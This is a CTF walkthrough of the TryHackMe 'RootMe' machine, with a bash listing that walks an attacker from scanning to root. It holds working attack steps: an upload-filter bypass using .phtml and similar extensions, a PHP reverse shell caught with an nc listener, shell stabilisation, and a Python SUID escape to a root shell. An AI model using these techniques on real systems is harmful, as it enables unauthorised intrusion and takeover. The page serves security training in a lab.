RootMe | TryHackMe Walkthroughs

RootMe is a classic file upload vulnerability machine. Learn to bypass file extension filters and escalate via SUID binaries.

Walkthrough

bash

1606070;"># Step 1: Scan
2nmap -sV TARGET_IP
3606070;"># 22 SSH, 80 HTTP
4 
5606070;"># Step 2: Directory Enumeration
6gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
7606070;"># Found: /panel (upload form)
8606070;"># Found: /uploads (where files go)
9 
10606070;"># Step 3: Upload Bypass
11606070;"># .php is blocked, try alternatives:
12606070;"># .php5, .phtml, .phar, .php7
13 
14606070;"># Create PHP reverse shell
15cp /usr/share/webshells/php/php-reverse-shell.php shell.phtml
16606070;"># Edit: Change IP and PORT
17 
18606070;"># Upload shell.phtml - SUCCESS!
19 
20606070;"># Step 4: Get Reverse Shell
21nc -lvnp 4444
22 
23606070;"># Trigger: http://TARGET_IP/uploads/shell.phtml
24606070;"># Shell received!
25 
26606070;"># Step 5: Stabilize Shell
27python -c 606070;">#a5d6ff;">'import pty;pty.spawn("/bin/bash")'
28export TERM=xterm
29606070;"># Ctrl+Z, then: stty raw -echo; fg
30 
31606070;"># Step 6: Find User Flag
32find / -name 606070;">#a5d6ff;">"user.txt" 2>/dev/null
33cat /var/www/user.txt
34 
35606070;"># Step 7: SUID Privesc
36find / -perm -u=s -type f 2>/dev/null
37606070;"># Found: /usr/bin/python
38 
39606070;"># Python SUID escape
40/usr/bin/python -c 606070;">#a5d6ff;">'import os; os.execl("/bin/bash", "bash", "-p")'
41 
42606070;"># Root!
43cat /root/root.txt

Attack Path

EnumFind /panel upload and /uploads

BypassUpload .phtml shell (bypasses .php filter)

ShellTrigger shell, get reverse connection

PrivescPython SUID for root

Knowledge Check

Quick Quiz

Question 1 of 1

How was the .php filter bypassed?

Key Takeaways

File upload filters often miss alternative extensions
Common bypasses: .php5, .phtml, .phar, .PhP
Always check where uploaded files go
Python SUID allows easy privilege escalation

Related Lessons

Mr. Robot CTF

SUID Exploitation

Command Injection